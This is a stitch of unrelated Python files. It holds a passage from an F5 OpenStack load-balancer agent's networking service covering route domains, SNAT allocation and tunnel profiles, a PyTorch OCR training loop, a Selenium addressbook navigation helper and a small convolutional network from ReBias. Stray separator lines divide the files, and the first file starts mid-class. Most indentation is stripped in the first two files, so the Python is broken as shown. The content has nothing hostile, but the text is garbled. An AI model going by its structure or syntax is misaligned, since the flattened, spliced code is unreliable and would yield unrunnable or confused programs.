# Provide FDB Connector with ML2 RPC access
self.l2_service.set_tunnel_rpc(tunnel_rpc)
def set_l2pop_rpc(self, l2pop_rpc):
# Provide FDB Connector with ML2 RPC access
self.l2_service.set_l2pop_rpc(l2pop_rpc)
def initialize_vcmp(self):
self.l2_service.initialize_vcmp_manager()
def initialize_tunneling(self, bigip):
# setup tunneling
vtep_folder = self.conf.f5_vtep_folder
vtep_selfip_name = self.conf.f5_vtep_selfip_name
bigip.local_ip = None
if not vtep_folder or vtep_folder.lower() == 'none':
vtep_folder = 'Common'
if vtep_selfip_name and \
not vtep_selfip_name.lower() == 'none':
# profiles may already exist
            # create vxlan_multipoint_profile
self.network_helper.create_vxlan_multipoint_profile(
bigip,
'vxlan_ovs',
partition='Common')
# create l2gre_multipoint_profile
self.network_helper.create_l2gre_multipoint_profile(
bigip,
'gre_ovs',
partition='Common')
# find the IP address for the selfip for each box
local_ip = self.bigip_selfip_manager.get_selfip_addr(
bigip,
vtep_selfip_name,
partition=vtep_folder
)
if local_ip:
bigip.local_ip = local_ip
else:
raise f5_ex.MissingVTEPAddress(
'device %s missing vtep selfip %s'
% (bigip.device_name,
'/' + vtep_folder + '/' +
vtep_selfip_name))
def assure_opflex_network_port(self, network_id, network):
port = None
port_name = "bigip-opflex-{}".format(network_id)
port = self.driver.plugin_rpc.create_port_on_network(
network_id=network_id,
name=port_name)
return port
def is_service_connected(self, service):
networks = service.get('networks', {})
supported_net_types = ['vlan', 'vxlan', 'gre', 'opflex']
for (network_id, network) in networks.iteritems():
if network_id in self.conf.common_network_ids:
continue
network_type = \
network.get('provider:network_type', "")
if network_type == "flat":
continue
segmentation_id = \
network.get('provider:segmentation_id', None)
if not segmentation_id:
if network_type in supported_net_types and \
self.conf.f5_network_segment_physical_network:
if network_type == "opflex":
# This is called only when the HPB config item
# f5_network_segment_physical_network is set.
self.assure_opflex_network_port(network_id, network)
return False
LOG.error("Misconfiguration: Segmentation ID is "
"missing from the service definition. "
"Please check the setting for "
"f5_network_segment_physical_network in "
"f5-openstack-agent.ini in case neutron "
"is operating in Hierarchical Port Binding "
"mode.")
raise f5_ex.InvalidNetworkDefinition(
"Network segment ID %s not defined" % network_id)
return True
def prep_service_networking(self, service, traffic_group):
"""Assure network connectivity is established on all bigips."""
if self.conf.f5_global_routed_mode:
return
if not self.is_service_connected(service):
raise f5_ex.NetworkNotReady(
"Network segment(s) definition incomplete")
if self.conf.use_namespaces:
try:
LOG.debug("Annotating the service definition networks "
"with route domain ID.")
self._annotate_service_route_domains(service)
except f5_ex.InvalidNetworkType as exc:
LOG.warning(exc.message)
except Exception as err:
LOG.exception(err)
raise f5_ex.RouteDomainCreationException(
"Route domain annotation error")
# Per Device Network Connectivity (VLANs or Tunnels)
subnetsinfo = self._get_subnets_to_assure(service)
for (assure_bigip, subnetinfo) in (
itertools.product(self.driver.get_all_bigips(), subnetsinfo)):
LOG.debug("Assuring per device network connectivity "
"for %s on subnet %s." % (assure_bigip.hostname,
subnetinfo['subnet']))
# Make sure the L2 network is established
self.l2_service.assure_bigip_network(
assure_bigip, subnetinfo['network'])
# Connect the BigIP device to network, by getting
# a self-ip address on the subnet.
self.bigip_selfip_manager.assure_bigip_selfip(
assure_bigip, service, subnetinfo)
# L3 Shared Config
assure_bigips = self.driver.get_config_bigips()
LOG.debug("Getting subnetinfo for ...")
LOG.debug(assure_bigips)
for subnetinfo in subnetsinfo:
if self.conf.f5_snat_addresses_per_subnet > 0:
self._assure_subnet_snats(assure_bigips, service, subnetinfo)
if subnetinfo['is_for_member'] and not self.conf.f5_snat_mode:
try:
self._allocate_gw_addr(subnetinfo)
except KeyError as err:
raise f5_ex.VirtualServerCreationException(err.message)
for assure_bigip in assure_bigips:
# If we are not using SNATS, attempt to become
# the subnet's default gateway.
self.bigip_selfip_manager.assure_gateway_on_subnet(
assure_bigip, subnetinfo, traffic_group)
def _annotate_service_route_domains(self, service):
# Add route domain notation to pool member and vip addresses.
tenant_id = service['loadbalancer']['tenant_id']
self.update_rds_cache(tenant_id)
if 'members' in service:
for member in service.get('members', []):
if 'address' in member:
LOG.debug("processing member %s" % member['address'])
if 'network_id' in member and member['network_id']:
member_network = (
self.service_adapter.get_network_from_service(
service,
member['network_id']
))
member_subnet = (
self.service_adapter.get_subnet_from_service(
service,
member['subnet_id']
))
if member_network:
self.assign_route_domain(
tenant_id, member_network, member_subnet)
rd_id = (
'%' + str(member_network['route_domain_id'])
)
member['address'] += rd_id
else:
member['address'] += '%0'
if 'vip_address' in service['loadbalancer']:
loadbalancer = service['loadbalancer']
if 'network_id' in loadbalancer:
lb_network = self.service_adapter.get_network_from_service(
service, loadbalancer['network_id'])
vip_subnet = self.service_adapter.get_subnet_from_service(
service, loadbalancer['vip_subnet_id'])
self.assign_route_domain(
tenant_id, lb_network, vip_subnet)
rd_id = '%' + str(lb_network['route_domain_id'])
service['loadbalancer']['vip_address'] += rd_id
else:
service['loadbalancer']['vip_address'] += '%0'
def is_common_network(self, network):
return self.l2_service.is_common_network(network)
def find_subnet_route_domain(self, tenant_id, subnet_id):
rd_id = 0
bigip = self.driver.get_bigip()
partition_id = self.service_adapter.get_folder_name(
tenant_id)
try:
tenant_rd = self.network_helper.get_route_domain(
bigip, partition=partition_id)
rd_id = tenant_rd.id
except HTTPError as error:
LOG.error(error)
return rd_id
def assign_route_domain(self, tenant_id, network, subnet):
# Assign route domain for a network
if self.l2_service.is_common_network(network):
network['route_domain_id'] = 0
return
LOG.debug("Assign route domain get from cache %s" % network)
try:
route_domain_id = self.get_route_domain_from_cache(network)
network['route_domain_id'] = route_domain_id
return
except f5_ex.RouteDomainCacheMiss as exc:
LOG.debug(exc.message)
LOG.debug("max namespaces: %s" % self.conf.max_namespaces_per_tenant)
LOG.debug("max namespaces == 1: %s" %
(self.conf.max_namespaces_per_tenant == 1))
if self.conf.max_namespaces_per_tenant == 1:
bigip = self.driver.get_bigip()
LOG.debug("bigip before get_domain: %s" % bigip)
partition_id = self.service_adapter.get_folder_name(
tenant_id)
tenant_rd = self.network_helper.get_route_domain(
bigip, partition=partition_id)
network['route_domain_id'] = tenant_rd.id
return
LOG.debug("assign route domain checking for available route domain")
check_cidr = netaddr.IPNetwork(subnet['cidr'])
placed_route_domain_id = None
for route_domain_id in self.rds_cache[tenant_id]:
LOG.debug("checking rd %s" % route_domain_id)
rd_entry = self.rds_cache[tenant_id][route_domain_id]
overlapping_subnet = None
for net_shortname in rd_entry:
LOG.debug("checking net %s" % net_shortname)
net_entry = rd_entry[net_shortname]
for exist_subnet_id in net_entry['subnets']:
if exist_subnet_id == subnet['id']:
continue
exist_subnet = net_entry['subnets'][exist_subnet_id]
exist_cidr = exist_subnet['cidr']
if check_cidr in exist_cidr or exist_cidr in check_cidr:
overlapping_subnet = exist_subnet
LOG.debug('rd %s: overlaps with subnet %s id: %s' % (
(route_domain_id, exist_subnet, exist_subnet_id)))
break
if overlapping_subnet:
# no need to keep looking
break
if not overlapping_subnet:
placed_route_domain_id = route_domain_id
break
if placed_route_domain_id is None:
if (len(self.rds_cache[tenant_id]) <
self.conf.max_namespaces_per_tenant):
placed_route_domain_id = self._create_aux_rd(tenant_id)
self.rds_cache[tenant_id][placed_route_domain_id] = {}
LOG.debug("Tenant %s now has %d route domains" %
(tenant_id, len(self.rds_cache[tenant_id])))
else:
raise Exception("Cannot allocate route domain")
LOG.debug("Placed in route domain %s" % placed_route_domain_id)
rd_entry = self.rds_cache[tenant_id][placed_route_domain_id]
net_short_name = self.get_neutron_net_short_name(network)
if net_short_name not in rd_entry:
rd_entry[net_short_name] = {'subnets': {}}
net_subnets = rd_entry[net_short_name]['subnets']
net_subnets[subnet['id']] = {'cidr': check_cidr}
network['route_domain_id'] = placed_route_domain_id
def _create_aux_rd(self, tenant_id):
# Create a new route domain
route_domain_id = None
bigips = self.driver.get_all_bigips()
rd_id = self.network_helper.get_next_domain_id(bigips)
for bigip in bigips:
partition_id = self.service_adapter.get_folder_name(tenant_id)
bigip_route_domain_id = self.network_helper.create_route_domain(
bigip,
rd_id,
partition=partition_id,
strictness=self.conf.f5_route_domain_strictness,
is_aux=True)
if route_domain_id is None:
route_domain_id = bigip_route_domain_id.id
elif bigip_route_domain_id.id != route_domain_id:
# FixME error
LOG.debug(
"Bigips allocated two different route domains!: %s %s"
% (bigip_route_domain_id, route_domain_id))
LOG.debug("Allocated route domain %s for tenant %s"
% (route_domain_id, tenant_id))
return route_domain_id
    # The purpose of the route domain subnet cache is to
    # determine whether there is an existing bigip
    # subnet that conflicts with a new one being
    # assigned to the route domain.
    """
    # route domain subnet cache layout: one entry per tenant, keyed by
    # route domain id, then by <network type>-<segmentation id>:
    rds_cache = {
        '<tenant_id>': {
            <route_domain_id>: {
                '<network type>-<segmentation id>': {
                    'subnets': {
                        '<subnet id>': {
                            'cidr': '<cidr>'
                        }
                    }
                }
            }
        }
    }
    """
def update_rds_cache(self, tenant_id):
# Update the route domain cache from bigips
if tenant_id not in self.rds_cache:
LOG.debug("rds_cache: adding tenant %s" % tenant_id)
self.rds_cache[tenant_id] = {}
for bigip in self.driver.get_all_bigips():
self.update_rds_cache_bigip(tenant_id, bigip)
LOG.debug("rds_cache updated: " + str(self.rds_cache))
def update_rds_cache_bigip(self, tenant_id, bigip):
# Update the route domain cache for this tenant
# with information from bigip's vlan and tunnels
LOG.debug("rds_cache: processing bigip %s" % bigip.device_name)
route_domain_ids = self.network_helper.get_route_domain_ids(
bigip,
partition=self.service_adapter.get_folder_name(tenant_id))
# LOG.debug("rds_cache: got bigip route domains: %s" % route_domains)
for route_domain_id in route_domain_ids:
self.update_rds_cache_bigip_rd_vlans(
tenant_id, bigip, route_domain_id)
def update_rds_cache_bigip_rd_vlans(
self, tenant_id, bigip, route_domain_id):
# Update the route domain cache with information
# from the bigip vlans and tunnels from
# this route domain
LOG.debug("rds_cache: processing bigip %s rd %s"
% (bigip.device_name, route_domain_id))
# this gets tunnels too
partition_id = self.service_adapter.get_folder_name(tenant_id)
rd_vlans = self.network_helper.get_vlans_in_route_domain_by_id(
bigip,
partition=partition_id,
id=route_domain_id
)
LOG.debug("rds_cache: bigip %s rd %s vlans: %s"
% (bigip.device_name, route_domain_id, rd_vlans))
if len(rd_vlans) == 0:
LOG.debug("No vlans found for route domain: %d" %
(route_domain_id))
return
# make sure this rd has a cache entry
tenant_entry = self.rds_cache[tenant_id]
if route_domain_id not in tenant_entry:
tenant_entry[route_domain_id] = {}
# for every VLAN or TUNNEL on this bigip...
for rd_vlan in rd_vlans:
self.update_rds_cache_bigip_vlan(
tenant_id, bigip, route_domain_id, rd_vlan)
def update_rds_cache_bigip_vlan(
self, tenant_id, bigip, route_domain_id, rd_vlan):
# Update the route domain cache with information
# from the bigip vlan or tunnel
LOG.debug("rds_cache: processing bigip %s rd %d vlan %s"
% (bigip.device_name, route_domain_id, rd_vlan))
net_short_name = self.get_bigip_net_short_name(
bigip, tenant_id, rd_vlan)
# make sure this net has a cache entry
tenant_entry = self.rds_cache[tenant_id]
rd_entry = tenant_entry[route_domain_id]
if net_short_name not in rd_entry:
rd_entry[net_short_name] = {'subnets': {}}
net_subnets = rd_entry[net_short_name]['subnets']
partition_id = self.service_adapter.get_folder_name(tenant_id)
LOG.debug("Calling get_selfips with: partition %s and vlan_name %s",
partition_id, rd_vlan)
selfips = self.bigip_selfip_manager.get_selfips(
bigip,
partition=partition_id,
vlan_name=rd_vlan
)
LOG.debug("rds_cache: got selfips")
for selfip in selfips:
LOG.debug("rds_cache: processing bigip %s rd %s vlan %s self %s" %
(bigip.device_name, route_domain_id, rd_vlan,
selfip.name))
if bigip.device_name not in selfip.name:
LOG.error("rds_cache: Found unexpected selfip %s for tenant %s"
% (selfip.name, tenant_id))
continue
subnet_id = selfip.name.split(bigip.device_name + '-')[1]
# convert 10.1.1.1%1/24 to 10.1.1.1/24
(addr, netbits) = selfip.address.split('/')
addr = addr.split('%')[0]
selfip.address = addr + '/' + netbits
# selfip addresses will have slash notation: 10.1.1.1/24
netip = netaddr.IPNetwork(selfip.address)
LOG.debug("rds_cache: updating subnet %s with %s"
% (subnet_id, str(netip.cidr)))
net_subnets[subnet_id] = {'cidr': netip.cidr}
LOG.debug("rds_cache: now %s" % self.rds_cache)
def get_route_domain_from_cache(self, network):
# Get route domain from cache by network
net_short_name = self.get_neutron_net_short_name(network)
for tenant_id in self.rds_cache:
tenant_cache = self.rds_cache[tenant_id]
for route_domain_id in tenant_cache:
if net_short_name in tenant_cache[route_domain_id]:
return route_domain_id
# Not found
raise f5_ex.RouteDomainCacheMiss(
"No route domain cache entry for {0}".format(net_short_name))
def remove_from_rds_cache(self, network, subnet):
# Get route domain from cache by network
LOG.debug("remove_from_rds_cache")
net_short_name = self.get_neutron_net_short_name(network)
for tenant_id in self.rds_cache:
LOG.debug("rds_cache: processing remove for %s" % tenant_id)
deleted_rds = []
tenant_cache = self.rds_cache[tenant_id]
for route_domain_id in tenant_cache:
if net_short_name in tenant_cache[route_domain_id]:
net_entry = tenant_cache[route_domain_id][net_short_name]
if subnet['id'] in net_entry['subnets']:
del net_entry['subnets'][subnet['id']]
if len(net_entry['subnets']) == 0:
del net_entry['subnets']
if len(tenant_cache[route_domain_id][net_short_name]) == 0:
del tenant_cache[route_domain_id][net_short_name]
if len(self.rds_cache[tenant_id][route_domain_id]) == 0:
deleted_rds.append(route_domain_id)
for rd in deleted_rds:
LOG.debug("removing route domain %d from tenant %s" %
(rd, tenant_id))
del self.rds_cache[tenant_id][rd]
def get_bigip_net_short_name(self, bigip, tenant_id, network_name):
# Return <network_type>-<seg_id> for bigip network
LOG.debug("get_bigip_net_short_name: %s:%s" % (
tenant_id, network_name))
partition_id = self.service_adapter.get_folder_name(tenant_id)
LOG.debug("network_name %s", network_name.split('/'))
network_name = network_name.split("/")[-1]
if 'tunnel-gre-' in network_name:
tunnel_key = self.network_helper.get_tunnel_key(
bigip,
network_name,
partition=partition_id
)
return 'gre-%s' % tunnel_key
elif 'tunnel-vxlan-' in network_name:
LOG.debug("Getting tunnel key for VXLAN: %s", network_name)
tunnel_key = self.network_helper.get_tunnel_key(
bigip,
network_name,
partition=partition_id
)
return 'vxlan-%s' % tunnel_key
else:
LOG.debug("Getting tunnel key for VLAN: %s", network_name)
vlan_id = self.network_helper.get_vlan_id(bigip,
name=network_name,
partition=partition_id)
return 'vlan-%s' % vlan_id
@staticmethod
def get_neutron_net_short_name(network):
# Return <network_type>-<seg_id> for neutron network
net_type = network.get('provider:network_type', None)
net_seg_key = network.get('provider:segmentation_id', None)
if not net_type or not net_seg_key:
raise f5_ex.InvalidNetworkType(
'Provider network attributes not complete:'
'provider: network_type - {0} '
'and provider:segmentation_id - {1}'
.format(net_type, net_seg_key))
return net_type + '-' + str(net_seg_key)
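    # Editorial example (hypothetical values): a neutron network dict carrying
    # {'provider:network_type': 'vxlan', 'provider:segmentation_id': 1234}
    # yields the short name 'vxlan-1234', the same form as the names produced
    # by get_bigip_net_short_name above for the corresponding BIG-IP tunnels.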
def _assure_subnet_snats(self, assure_bigips, service, subnetinfo):
# Ensure snat for subnet exists on bigips
tenant_id = service['loadbalancer']['tenant_id']
subnet = subnetinfo['subnet']
snats_per_subnet = self.conf.f5_snat_addresses_per_subnet
lb_id = service['loadbalancer']['id']
assure_bigips = \
[bigip for bigip in assure_bigips
if tenant_id not in bigip.assured_tenant_snat_subnets or
subnet['id'] not in
bigip.assured_tenant_snat_subnets[tenant_id]]
LOG.debug("_assure_subnet_snats: getting snat addrs for: %s" %
subnet['id'])
if len(assure_bigips):
snat_addrs = self.bigip_snat_manager.get_snat_addrs(
subnetinfo, tenant_id, snats_per_subnet, lb_id)
if len(snat_addrs) != snats_per_subnet:
raise f5_ex.SNATCreationException(
"Unable to satisfy request to allocate %d "
"snats. Actual SNAT count: %d SNATs" %
(snats_per_subnet, len(snat_addrs)))
for assure_bigip in assure_bigips:
self.bigip_snat_manager.assure_bigip_snats(
assure_bigip, subnetinfo, snat_addrs, tenant_id)
def _allocate_gw_addr(self, subnetinfo):
# Create a name for the port and for the IP Forwarding
# Virtual Server as well as the floating Self IP which
# will answer ARP for the members
need_port_for_gateway = False
network = subnetinfo['network']
subnet = subnetinfo['subnet']
if not network or not subnet:
LOG.error('Attempted to create default gateway'
' for network with no id...skipping.')
return
if not subnet['gateway_ip']:
raise KeyError("attempting to create gateway on subnet without "
"gateway ip address specified.")
gw_name = "gw-" + subnet['id']
ports = self.driver.plugin_rpc.get_port_by_name(port_name=gw_name)
if len(ports) < 1:
need_port_for_gateway = True
# There was no port on this agent's host, so get one from Neutron
if need_port_for_gateway:
try:
rpc = self.driver.plugin_rpc
new_port = rpc.create_port_on_subnet_with_specific_ip(
subnet_id=subnet['id'], mac_address=None,
name=gw_name, ip_address=subnet['gateway_ip'])
LOG.info('gateway IP for subnet %s will be port %s'
% (subnet['id'], new_port['id']))
except Exception as exc:
ermsg = 'Invalid default gateway for subnet %s:%s - %s.' \
% (subnet['id'],
subnet['gateway_ip'],
exc.message)
ermsg += " SNAT will not function and load balancing"
ermsg += " support will likely fail. Enable f5_snat_mode."
LOG.exception(ermsg)
return True
def post_service_networking(self, service, all_subnet_hints):
# Assure networks are deleted from big-ips
if self.conf.f5_global_routed_mode:
return
# L2toL3 networking layer
# Non Shared Config - Local Per BIG-IP
self.update_bigip_l2(service)
# Delete shared config objects
deleted_names = set()
for bigip in self.driver.get_config_bigips():
LOG.debug('post_service_networking: calling '
'_assure_delete_networks del nets sh for bigip %s %s'
% (bigip.device_name, all_subnet_hints))
subnet_hints = all_subnet_hints[bigip.device_name]
deleted_names = deleted_names.union(
self._assure_delete_nets_shared(bigip, service,
subnet_hints))
# Delete non shared config objects
for bigip in self.driver.get_all_bigips():
LOG.debug(' post_service_networking: calling '
' _assure_delete_networks del nets ns for bigip %s'
% bigip.device_name)
subnet_hints = all_subnet_hints[bigip.device_name]
deleted_names = deleted_names.union(
self._assure_delete_nets_nonshared(
bigip, service, subnet_hints)
)
for port_name in deleted_names:
LOG.debug(' post_service_networking: calling '
' del port %s'
% port_name)
self.driver.plugin_rpc.delete_port_by_name(
port_name=port_name)
def update_bigip_l2(self, service):
# Update fdb entries on bigip
loadbalancer = service['loadbalancer']
service_adapter = self.service_adapter
bigips = self.driver.get_all_bigips()
update_members = list()
delete_members = list()
update_loadbalancer = None
delete_loadbalancer = None
if "network_id" not in loadbalancer:
LOG.error("update_bigip_l2, expected network ID")
return
if loadbalancer.get('provisioning_status', None) == \
constants_v2.F5_PENDING_DELETE:
delete_loadbalancer = loadbalancer
else:
update_loadbalancer = loadbalancer
members = service.get('members', [])
for member in members:
member['network'] = service_adapter.get_network_from_service(
service, member['network_id'])
if member.get('provisioning_status', None) == \
constants_v2.F5_PENDING_DELETE:
delete_members.append(member)
else:
update_members.append(member)
loadbalancer['network'] = service_adapter.get_network_from_service(
service,
loadbalancer['network_id']
)
if delete_loadbalancer or delete_members:
self.l2_service.delete_fdb_entries(
bigips, delete_loadbalancer, delete_members)
if update_loadbalancer or update_members:
self.l2_service.add_fdb_entries(
bigips, update_loadbalancer, update_members)
LOG.debug("update_bigip_l2 complete")
def _assure_delete_nets_shared(self, bigip, service, subnet_hints):
# Assure shared configuration (which syncs) is deleted
deleted_names = set()
tenant_id = service['loadbalancer']['tenant_id']
delete_gateway = self.bigip_selfip_manager.delete_gateway_on_subnet
for subnetinfo in self._get_subnets_to_delete(bigip,
service,
subnet_hints):
try:
if not self.conf.f5_snat_mode:
gw_name = delete_gateway(bigip, subnetinfo)
deleted_names.add(gw_name)
my_deleted_names, my_in_use_subnets = \
self.bigip_snat_manager.delete_bigip_snats(
bigip, subnetinfo, tenant_id)
deleted_names = deleted_names.union(my_deleted_names)
for in_use_subnetid in my_in_use_subnets:
subnet_hints['check_for_delete_subnets'].pop(
in_use_subnetid, None)
except f5_ex.F5NeutronException as exc:
LOG.error("assure_delete_nets_shared: exception: %s"
% str(exc.msg))
except Exception as exc:
LOG.error("assure_delete_nets_shared: exception: %s"
% str(exc.message))
return deleted_names
def _assure_delete_nets_nonshared(self, bigip, service, subnet_hints):
# Delete non shared base objects for networks
deleted_names = set()
for subnetinfo in self._get_subnets_to_delete(bigip,
service,
subnet_hints):
try:
network = subnetinfo['network']
if self.l2_service.is_common_network(network):
network_folder = 'Common'
else:
network_folder = self.service_adapter.get_folder_name(
service['loadbalancer']['tenant_id'])
subnet = subnetinfo['subnet']
if self.conf.f5_populate_static_arp:
self.network_helper.arp_delete_by_subnet(
bigip,
subnet=subnet['cidr'],
mask=None,
partition=network_folder
)
local_selfip_name = "local-" + bigip.device_name + \
"-" + subnet['id']
selfip_address = self.bigip_selfip_manager.get_selfip_addr(
bigip,
local_selfip_name,
partition=network_folder
)
if not selfip_address:
LOG.error("Failed to get self IP address %s in cleanup.",
local_selfip_name)
self.bigip_selfip_manager.delete_selfip(
bigip,
local_selfip_name,
partition=network_folder
)
if self.l3_binding and selfip_address:
self.l3_binding.unbind_address(subnet_id=subnet['id'],
ip_address=selfip_address)
deleted_names.add(local_selfip_name)
if self.conf.f5_network_segment_physical_network:
opflex_net_id = network.get('id')
if opflex_net_id:
opflex_net_port = "bigip-opflex-{}".format(
opflex_net_id)
deleted_names.add(opflex_net_port)
self.l2_service.delete_bigip_network(bigip, network)
if subnet['id'] not in subnet_hints['do_not_delete_subnets']:
subnet_hints['do_not_delete_subnets'].append(subnet['id'])
self.remove_from_rds_cache(network, subnet)
tenant_id = service['loadbalancer']['tenant_id']
if tenant_id in bigip.assured_tenant_snat_subnets:
tenant_snat_subnets = \
bigip.assured_tenant_snat_subnets[tenant_id]
if subnet['id'] in tenant_snat_subnets:
tenant_snat_subnets.remove(subnet['id'])
except f5_ex.F5NeutronException as exc:
LOG.debug("assure_delete_nets_nonshared: exception: %s"
% str(exc.msg))
except Exception as exc:
LOG.debug("assure_delete_nets_nonshared: exception: %s"
% str(exc.message))
return deleted_names
def _get_subnets_to_delete(self, bigip, service, subnet_hints):
# Clean up any Self IP, SNATs, networks, and folder for
# services items that we deleted.
subnets_to_delete = []
for subnetinfo in subnet_hints['check_for_delete_subnets'].values():
subnet = self.service_adapter.get_subnet_from_service(
service, subnetinfo['subnet_id'])
subnetinfo['subnet'] = subnet
network = self.service_adapter.get_network_from_service(
service, subnetinfo['network_id'])
subnetinfo['network'] = network
route_domain = network.get('route_domain_id', None)
if not subnet:
continue
if not self._ips_exist_on_subnet(
bigip,
service,
subnet,
route_domain):
subnets_to_delete.append(subnetinfo)
return subnets_to_delete
def _ips_exist_on_subnet(self, bigip, service, subnet, route_domain):
# Does the big-ip have any IP addresses on this subnet?
LOG.debug("_ips_exist_on_subnet entry %s rd %s"
% (str(subnet['cidr']), route_domain))
route_domain = str(route_domain)
ipsubnet = netaddr.IPNetwork(subnet['cidr'])
# Are there any virtual addresses on this subnet?
folder = self.service_adapter.get_folder_name(
service['loadbalancer']['tenant_id']
)
virtual_services = self.network_helper.get_virtual_service_insertion(
bigip,
partition=folder
)
for virt_serv in virtual_services:
(_, dest) = virt_serv.items()[0]
LOG.debug(" _ips_exist_on_subnet: checking vip %s"
% str(dest['address']))
if len(dest['address'].split('%')) > 1:
vip_route_domain = dest['address'].split('%')[1]
else:
vip_route_domain = '0'
if vip_route_domain != route_domain:
continue
vip_addr = strip_domain_address(dest['address'])
if netaddr.IPAddress(vip_addr) in ipsubnet:
LOG.debug(" _ips_exist_on_subnet: found")
return True
# If there aren't any virtual addresses, are there
# node addresses on this subnet?
nodes = self.network_helper.get_node_addresses(
bigip,
partition=folder
)
for node in nodes:
LOG.debug(" _ips_exist_on_subnet: checking node %s"
% str(node))
if len(node.split('%')) > 1:
node_route_domain = node.split('%')[1]
else:
node_route_domain = '0'
if node_route_domain != route_domain:
continue
node_addr = strip_domain_address(node)
if netaddr.IPAddress(node_addr) in ipsubnet:
LOG.debug(" _ips_exist_on_subnet: found")
return True
LOG.debug(" _ips_exist_on_subnet exit %s"
% str(subnet['cidr']))
# nothing found
return False
def add_bigip_fdb(self, bigip, fdb):
self.l2_service.add_bigip_fdb(bigip, fdb)
def remove_bigip_fdb(self, bigip, fdb):
self.l2_service.remove_bigip_fdb(bigip, fdb)
def update_bigip_fdb(self, bigip, fdb):
self.l2_service.update_bigip_fdb(bigip, fdb)
def set_context(self, context):
self.l2_service.set_context(context)
def vlan_exists(self, bigip, network, folder='Common'):
return self.vlan_manager.exists(bigip, name=network, partition=folder)
def _get_subnets_to_assure(self, service):
# Examine service and return active networks
networks = dict()
loadbalancer = service['loadbalancer']
service_adapter = self.service_adapter
lb_status = loadbalancer['provisioning_status']
if lb_status != constants_v2.F5_PENDING_DELETE:
if 'network_id' in loadbalancer:
network = service_adapter.get_network_from_service(
service,
loadbalancer['network_id']
)
subnet = service_adapter.get_subnet_from_service(
service,
loadbalancer['vip_subnet_id']
)
networks[subnet['id']] = {'network': network,
'subnet': subnet,
'is_for_member': False}
for member in service.get('members', []):
if member['provisioning_status'] != constants_v2.F5_PENDING_DELETE:
if 'network_id' in member:
network = service_adapter.get_network_from_service(
service,
member['network_id']
)
subnet = service_adapter.get_subnet_from_service(
service,
member['subnet_id']
)
networks[subnet['id']] = {'network': network,
'subnet': subnet,
'is_for_member': True}
return networks.values()
|
python
|
import numpy as np
import torch
from net import Net
from generator import Generator
import utils
EPOCHS = 100000
BATCH_SIZE = 32
LR = 1e-3
LR_STEP = 0.1
LR_FAILS = 3
SIZE = (40, 40)
MARGIN = 1
NOISE = 0.1
MAX_LENGTH = 5
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
np.set_printoptions(threshold=np.inf, precision=4, suppress=True, linewidth=160)
gen = Generator(MAX_LENGTH, SIZE, MARGIN, NOISE)
net = Net(DEVICE)
print(net)
#---- train
def get_batch(size):
batch_x = []
batch_y = []
batch_lm = np.ones((size, MAX_LENGTH), dtype=np.float32) # loss mask
for i in range(size):
chars, img, ln = gen.generate()
chars = list(map(lambda x: ord(x), chars))
chars = np.array(chars)
batch_x.append(img)
batch_y.append(chars)
batch_lm[i, ln+1:] = 0
batch_x = np.array(batch_x, dtype=np.float32) / 255
batch_y = np.array(batch_y, dtype=np.int64) - ord('A')
return batch_x, batch_y, batch_lm
test_x, test_y, test_lm = get_batch(1024)
lr = LR
losses = []
best_loss = 1e6
lr_fails = 0
net.set_lr(lr)
print("LR: {:.2e}".format(lr))
fps = utils.Fps()
fps.start()
for e in range(EPOCHS):
train_x, train_y, train_lm = get_batch(BATCH_SIZE)
net.train(train_x, train_y, MAX_LENGTH, train_lm)
if utils.is_time(e, 100):
pred_y, msks = net(test_x, MAX_LENGTH)
pred_y = pred_y.argmax(dim=2).detach().cpu().numpy()
cond = np.logical_or( (pred_y == test_y), (1 - test_lm) )
corr = np.all(cond, 1).mean()
test_loss = net.get_loss(test_x, test_y, MAX_LENGTH, test_lm).item()
print("Epoch {}: loss {:.3f}, corr: {:.0f}%, fps: {:.1f}".format(e, test_loss, corr * 100, fps.fps(e)))
losses.append(test_loss)
if test_loss > best_loss:
lr_fails += 1
print("." * lr_fails)
if lr_fails >= LR_FAILS:
lr = lr * LR_STEP
net.set_lr(lr)
print("LR: {:.2e}".format(lr))
else:
best_loss = test_loss
lr_fails = 0
if utils.is_time(e, 1000):
torch.save(net.state_dict(), 'model')
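# Editorial note: the manual lr_fails / LR_STEP logic above is a hand-rolled
# form of what torch.optim.lr_scheduler.ReduceLROnPlateau provides. Assuming
# the optimizer were exposed (hypothetically as net.optimizer), the equivalent
# would be roughly:
#     scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
#         net.optimizer, mode='min', factor=LR_STEP, patience=LR_FAILS)
#     scheduler.step(test_loss)  # called after each evaluation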
|
python
|
# under development
class NavigationHelper:
def __init__(self, app):
self.app = app
def open_home_page(self):
        wd = self.app.wd
# open home page
wd.get("http://localhost/adressbook/group.php")
def open_group_page(self):
        wd = self.app.wd
# open group page
wd.find_element_by_link_text("groups").click()
|
python
|
"""ReBias
Copyright (c) 2020-present NAVER Corp.
MIT license
Implementation of simple stacked convolutional networks.
"""
import torch
import torch.nn as nn
class SimpleConvNet(nn.Module):
def __init__(self, num_classes=None, kernel_size=7, feature_pos='post'):
super(SimpleConvNet, self).__init__()
padding = kernel_size // 2
layers = [
nn.Conv2d(3, 16, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(16),
nn.ReLU(inplace=True),
nn.Conv2d(16, 32, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 128, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
]
self.extracter = nn.Sequential(*layers)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(128, num_classes if num_classes is not None else 10)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if feature_pos not in ['pre', 'post', 'logits']:
raise ValueError(feature_pos)
self.feature_pos = feature_pos
def forward(self, x, logits_only=False):
pre_gap_feats = self.extracter(x)
post_gap_feats = self.avgpool(pre_gap_feats)
post_gap_feats = torch.flatten(post_gap_feats, 1)
logits = self.fc(post_gap_feats)
if logits_only:
return logits
elif self.feature_pos == 'pre':
feats = pre_gap_feats
elif self.feature_pos == 'post':
feats = post_gap_feats
else:
feats = logits
return logits, feats
